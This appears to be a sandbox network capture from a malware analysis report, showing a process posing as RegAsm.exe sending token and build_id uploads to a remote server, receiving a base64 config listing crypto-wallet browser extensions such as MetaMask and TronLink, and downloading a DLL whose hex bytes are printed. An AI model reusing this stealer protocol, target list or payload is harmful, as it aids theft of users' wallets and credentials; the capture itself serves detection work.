                                                                          2024-05-22 16:28:02 UTC5605INData Raw: 31 35 64 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                          Data Ascii: 15d8TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          5192.168.2.64970478.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:02 UTC278OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----GHJDBAKEHDHDGCAKKJJE
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 332
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:02 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 47 48 4a 44 42 41 4b 45 48 44 48 44 47 43 41 4b 4b 4a 4a 45 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------GHJDBAKEHDHDGCAKKJJEContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------GHJDBAKEHDHDGCAKKJJECont
                                                                          2024-05-22 16:28:03 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:03 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:03 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          6192.168.2.64970578.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:04 UTC279OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----IDBKKKKKFBGDGDHIDBGH
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 6949
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:04 UTC6949OUTData Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 4b 4b 4b 4b 46 42 47 44 47 44 48 49 44 42 47 48 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------IDBKKKKKFBGDGDHIDBGHContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------IDBKKKKKFBGDGDHIDBGHCont
                                                                          2024-05-22 16:28:05 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:05 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:05 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 2ok0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          7192.168.2.64970678.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:05 UTC194OUTGET /sqls.dll HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:05 UTC248INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:05 GMT
                                                                          Content-Type: application/octet-stream
                                                                          Content-Length: 2459136
                                                                          Last-Modified: Sun, 19 May 2024 16:18:18 GMT
                                                                          Connection: close
                                                                          ETag: "664a264a-258600"
                                                                          Accept-Ranges: bytes
                                                                          2024-05-22 16:28:05 UTC16136INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                          2024-05-22 16:28:05 UTC16384INData Raw: cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                          Data Ascii: X~e!*FW|>|L1146
                                                                          2024-05-22 16:28:06 UTC16384INData Raw: 74 12 8a 50 01 3a 51 01 75 0e 83 c0 02 83 c1 02 84 d2 75 e4 33 c0 eb 05 1b c0 83 c8 01 85 c0 74 15 83 c6 0c 47 81 fe c0 03 00 00 72 bf 5f 5e b8 0c 00 00 00 5b c3 8d 0c 7f 8b 14 8d 38 25 24 10 8d 04 8d 34 25 24 10 85 d2 75 09 8b 10 89 14 8d 38 25 24 10 8b 4c 24 18 85 c9 5f 0f 44 ca 5e 89 08 33 c0 5b c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 33 ff 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 53 6a 02 6a ff ff 74 24 1c 56 e8 78 0c 15 00 8b d8 83 c4 10 85 db 74 21 6a 00 ff 74 24 24 ff 74 24 24 ff 74 24 24 53 56 e8 9a 68 04 00 53 56 8b f8 e8 51 39 10 00 83 c4 20 80 7e 57 00 5b
                                                                          Data Ascii: tP:Quu3tGr_^[8%$4%$u8%$L$_D^3[Vt$W3FtPh $Sjjt$Vxt!jt$$t$$t$$SVhSVQ9 ~W[
                                                                          2024-05-22 16:28:06 UTC16384INData Raw: be 0e 83 f9 30 7d e9 89 74 24 74 81 e3 ff ff ff 7f 89 5c 24 30 83 f9 6c 75 35 4e 0f be 4e 01 46 89 74 24 74 85 c9 0f 85 f0 fd ff ff eb 21 0f be 4e 01 46 c6 44 24 37 01 89 74 24 74 83 f9 6c 75 0e 0f be 4e 01 46 89 74 24 74 c6 44 24 37 02 8b 44 24 38 33 f6 89 44 24 58 ba 70 53 21 10 c7 44 24 50 70 53 21 10 c6 44 24 2e 11 0f be 02 3b c8 74 16 83 c2 06 46 81 fa fa 53 21 10 7c ed 8a 4c 24 2e 8b 54 24 50 eb 19 8d 04 76 8a 0c 45 73 53 21 10 8d 14 45 70 53 21 10 89 54 24 50 88 4c 24 2e 0f b6 c1 83 f8 10 0f 87 d9 14 00 00 ff 24 85 24 e1 00 10 c6 44 24 37 01 c6 44 24 43 00 f6 42 02 01 0f 84 97 00 00 00 80 7c 24 2d 00 74 44 8b 74 24 70 8b 56 04 39 16 7f 22 0f 57 c0 66 0f 13 44 24 68 8b 4c 24 6c 8b 74 24 68 8a 54 24 35 89 74 24 28 89 4c 24 58 e9 f4 00 00 00 8b 46 08
                                                                          Data Ascii: 0}t$t\$0lu5NNFt$t!NFD$7t$tluNFt$tD$7D$83D$XpS!D$PpS!D$.;tFS!|L$.T$PvEsS!EpS!T$PL$.$$D$7D$CB|$-tDt$pV9"WfD$hL$lt$hT$5t$(L$XF
                                                                          2024-05-22 16:28:06 UTC16384INData Raw: 24 14 3b c8 73 06 eb 0e 8b 44 24 14 8b c8 89 44 24 20 89 54 24 24 a1 08 22 24 10 03 44 24 10 99 8b f8 8b ea 85 f6 0f 85 6b 01 00 00 3b 6c 24 24 0f 8f 91 00 00 00 7c 08 3b f9 0f 83 87 00 00 00 8b 44 24 10 99 6a 00 8b ca c7 44 24 48 00 00 00 00 8d 54 24 48 89 44 24 38 52 51 50 55 57 89 4c 24 50 e8 38 3a ff ff 40 50 8b 44 24 34 50 8b 80 dc 00 00 00 ff d0 8b f0 83 c4 10 85 f6 75 1e 8b 54 24 1c 8b 44 24 44 55 57 ff 74 24 18 8b 0a ff 70 04 52 8b 41 0c ff d0 83 c4 14 8b f0 8b 44 24 44 85 c0 74 09 50 e8 dd f4 12 00 83 c4 04 03 7c 24 34 8b 4c 24 20 13 6c 24 38 85 f6 0f 84 6a ff ff ff e9 d0 00 00 00 8b 7c 24 1c 8d 4c 24 38 51 57 8b 07 8b 40 18 ff d0 8b f0 83 c4 08 85 f6 0f 85 b2 00 00 00 8b 4c 24 2c 39 4c 24 3c 7c 1e 7f 0a 8b 44 24 14 39 44 24 38 76 12 8b 07 51 ff
                                                                          Data Ascii: $;sD$D$ T$$"$D$k;l$$|;D$jD$HT$HD$8RQPUWL$P8:@PD$4PuT$D$DUWt$pRAD$DtP|$4L$ l$8j|$L$8QW@L$,9L$<|D$9D$8vQ
                                                                          2024-05-22 16:28:06 UTC16384INData Raw: 00 00 33 ff c7 40 0c 00 00 00 00 66 c7 40 11 01 00 8b 44 24 10 56 89 46 40 e8 3a 27 0d 00 83 c4 04 8b f0 eb 08 8b 7c 24 10 8b 74 24 0c 85 ff 0f 84 9d 00 00 00 83 47 10 ff 0f 85 93 00 00 00 ff 4b 3c 83 7f 08 01 75 0d 83 7f 0c 00 75 07 c7 43 1c ff ff ff ff 8b 07 85 c0 74 0e 50 53 e8 46 87 0a 00 83 c4 08 85 c0 75 0a 57 53 e8 38 88 0a 00 83 c4 08 57 53 e8 5e 81 0a 00 83 c4 08 83 3d 18 20 24 10 00 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 57 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 57 ff 15 3c 20 24 10 a1 38 82 24 10 83 c4 08 85 c0 74 13 50 ff 15 70 20 24 10 eb 07 57 ff 15 3c 20 24 10 83 c4 04 53 e8 a0 17 0d 00 83 c4 04 8b c6 5f 5e 5b 8b e5 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                          Data Ascii: 3@f@D$VF@:'|$t$GK<uuCtPSFuWS8WS^= $tB8$tPh $WD $)$$W< $8$tPp $W< $S_^[]
                                                                          2024-05-22 16:28:06 UTC16384INData Raw: ff ff 0f b7 86 90 00 00 00 8b de 8b 54 24 10 8b 4c 24 24 8b 6c 24 20 89 47 10 8b 86 98 00 00 00 c1 e8 06 83 e0 01 89 54 24 10 89 47 14 80 bb 97 00 00 00 02 89 4c 24 14 0f 85 c8 fe ff ff b8 01 00 00 00 89 4c 24 14 89 54 24 10 e9 b8 fe ff ff 5f 5e 5d b8 07 00 00 00 5b 83 c4 18 c3 5f 5e 5d 33 c0 5b 83 c4 18 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                          Data Ascii: T$L$$l$ GT$GL$L$T$_^][_^]3[
                                                                          2024-05-22 16:28:06 UTC16384INData Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 7c 24 14 8b 46 10 8b 56 0c 8d 0c 80 8b 42 68 ff 74 88 fc ff 77 04 ff 37 e8 ac f3 11 00 83 c4 0c 85 c0 74 0b ff 37 56 e8 d3 67 fe ff 83 c4 08 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68 2c 67 21 10 ff 74 24 14 e8 bc d7 0d 00 83 c4 14 c3 cc cc cc cc cc cc cc cc 6a 00 6a 01 6a ff 68
                                                                          Data Ascii: Vt$W|$FVBhtw7t7Vg_^jjjh,g!t$jjjh
                                                                          2024-05-22 16:28:06 UTC16384INData Raw: 71 14 8b 41 08 f7 76 34 8b 46 38 8d 14 90 8b 02 3b c1 74 0d 0f 1f 40 00 8d 50 10 8b 02 3b c1 75 f7 8b 40 10 89 02 ff 4e 30 66 83 79 0c 00 8b 71 14 74 10 8b 46 3c 89 41 10 8b 46 04 89 4e 3c 5e ff 08 c3 ff 31 e8 6e 5a 0a 00 8b 46 04 83 c4 04 ff 08 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 4c 24 04 8b 54 24 10 56 57 8b 71 0c 85 f6 74 3c 8b 06 83 f8 01 74 1f 83 f8 02 74 1a 83 f8 05 74 15 33 ff 83 f8 03 75 26 bf 01 00 00 00 85 d7 74 1d 5f 33 c0 5e c3 83 7c 24 10 01 75 f4 83 7c 24 14 01 75 ed 5f b8 05 00 00 00 5e c3 33 ff 8b 41 04 52 ff 74 24 18 8b 08 ff 74 24 18 50 8b 41 38 ff d0 83 c4 10 85 ff 74 1c 85 c0 75 18 8b 4c 24 14 ba 01 00 00 00 d3 e2 8b 4c 24 10 4a d3 e2 09 96 c4 00 00 00 5f
                                                                          Data Ascii: qAv4F8;t@P;u@N0fyqtF<AFN<^1nZF^L$T$VWqt<ttt3u&t_3^|$u|$u_^3ARt$t$PA8tuL$L$J_
                                                                          2024-05-22 16:28:06 UTC16384INData Raw: cc cc cc cc cc cc cc cc 56 8b 74 24 08 57 8b 46 0c 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 6a 00 6a 00 68 50 45 24 10 68 e8 40 22 10 56 e8 25 83 14 00 83 c4 14 80 7e 57 00 75 04 33 ff eb 0d 6a 00 56 e8 d0 b5 01 00 83 c4 08 8b f8 8b 46 0c 85 c0 74 0a 50 ff 15 70 20 24 10 83 c4 04 8b c7 5f 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b 7c 24 10 ff b7 dc 00 00 00 e8 6d f6 fd ff 83 c4 04 8d 77 3c bb 28 00 00 00 0f 1f 00 ff 36 e8 58 f6 fd ff 83 c4 04 8d 76 04 83 eb 01 75 ee 8b b7 f8 00 00 00 85 f6 74 54 39 1d 18 20 24 10 74 42 a1 38 82 24 10 85 c0 74 0a 50 ff 15 68 20 24 10 83 c4 04 56 ff 15 44 20 24 10 29 05 d0 81 24 10 ff 0d f4 81 24 10 56 ff 15 3c 20 24 10 a1 38 82 24 10 83
                                                                          Data Ascii: Vt$WFtPh $jjhPE$h@"V%~Wu3jVFtPp $_^SVW|$mw<(6XvutT9 $tB8$tPh $VD $)$$V< $8$


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          8192.168.2.64970778.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:09 UTC278OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHII
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 829
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:09 UTC829OUTData Raw: 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 43 41 4b 4b 4a 44 42 4b 4b 46 48 4a 4a 44 48 49 49 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------IEHCAKKJDBKKFHJJDHIIContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------IEHCAKKJDBKKFHJJDHIICont
                                                                          2024-05-22 16:28:09 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:09 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:09 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 2ok0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          9192.168.2.64970878.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:10 UTC278OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----DBFCBGCGIJKJKECAKEGC
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 437
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:10 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 43 42 47 43 47 49 4a 4b 4a 4b 45 43 41 4b 45 47 43 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------DBFCBGCGIJKJKECAKEGCContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------DBFCBGCGIJKJKECAKEGCCont
                                                                          2024-05-22 16:28:11 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Wed, 22 May 2024 16:28:11 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          2024-05-22 16:28:11 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 2ok0


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          10192.168.2.64970978.47.123.1744435768C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-05-22 16:28:12 UTC278OUTPOST / HTTP/1.1
                                                                          Content-Type: multipart/form-data; boundary=----FHDAFIIDAKJDGDHIDAKJ
                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                          Host: 78.47.123.174
                                                                          Content-Length: 437
                                                                          Connection: Keep-Alive
                                                                          Cache-Control: no-cache
                                                                          2024-05-22 16:28:12 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 30 38 64 31 65 30 30 34 37 36 33 34 35 37 62 39 61 64 66 66 61 33 62 30 61 39 33 34 36 63 39 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 32 31 62 34 35 61 34 33 32 38 38 39 61 66 36 35 61 61 30 35 63 64 36 36 39 32 30 64 30 61 32 0d 0a 2d 2d 2d 2d 2d 2d 46 48 44 41 46 49 49 44 41 4b 4a 44 47 44 48 49 44 41 4b 4a 0d 0a 43 6f 6e 74
                                                                          Data Ascii: ------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="token"908d1e004763457b9adffa3b0a9346c9------FHDAFIIDAKJDGDHIDAKJContent-Disposition: form-data; name="build_id"c21b45a432889af65aa05cd66920d0a2------FHDAFIIDAKJDGDHIDAKJCont
                                                                          2024-05-22 16:28:12 UTC158INHTTP/1.1 200 OK
                                                                          Server: nginx
